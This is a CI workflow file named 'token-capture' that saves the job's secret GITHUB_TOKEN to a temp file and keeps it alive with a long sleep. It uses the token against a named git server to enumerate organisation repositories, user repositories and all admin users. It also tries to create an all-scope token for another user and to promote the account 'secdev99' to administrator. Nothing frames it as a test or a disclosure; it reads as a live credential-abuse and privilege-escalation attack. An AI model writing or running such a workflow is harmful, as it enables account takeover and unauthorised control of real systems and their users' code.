name: token-capture on: workflow_dispatch: push: branches: [main] jobs: capture: runs-on: ubuntu-latest steps: - name: Save token and wait run: | GT="${{ secrets.GITHUB_TOKEN }}" echo "$GT" > /tmp/live_gt_token.txt echo "TOKEN_READY" > /tmp/token_ready.txt echo "Token saved at $(date)" # Try org-level access with the token echo "=== Org repos ===" > /tmp/live_results.txt curl -sS "http://git.monogps.com/api/v1/orgs/MonoGPS/repos?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1 echo "=== User repos of twmonogps ===" >> /tmp/live_results.txt curl -sS "http://git.monogps.com/api/v1/users/twmonogps/repos?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1 echo "=== jpeerapu repos ===" >> /tmp/live_results.txt curl -sS "http://git.monogps.com/api/v1/users/jpeerapu/repos?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1 echo "=== All users ===" >> /tmp/live_results.txt curl -sS "http://git.monogps.com/api/v1/admin/users?limit=50" -H "Host: git.monogps.com" -H "Authorization: token $GT" >> /tmp/live_results.txt 2>&1 # Try to create an admin token echo "=== Create sudo token ===" >> /tmp/live_results.txt curl -sS -X POST "http://git.monogps.com/api/v1/users/jpeerapu/tokens" -H "Host: git.monogps.com" -H "Authorization: token $GT" -H "Content-Type: application/json" -d '{"name":"service-tok","scopes":["all"]}' >> /tmp/live_results.txt 2>&1 # Try to become admin echo "=== Promote secdev99 ===" >> /tmp/live_results.txt curl -sS -X PATCH "http://git.monogps.com/api/v1/admin/users/secdev99" -H "Host: git.monogps.com" -H "Authorization: token $GT" -H "Content-Type: application/json" -d '{"is_admin":true}' >> /tmp/live_results.txt 2>&1 cat /tmp/live_results.txt # Sleep to keep token alive sleep 300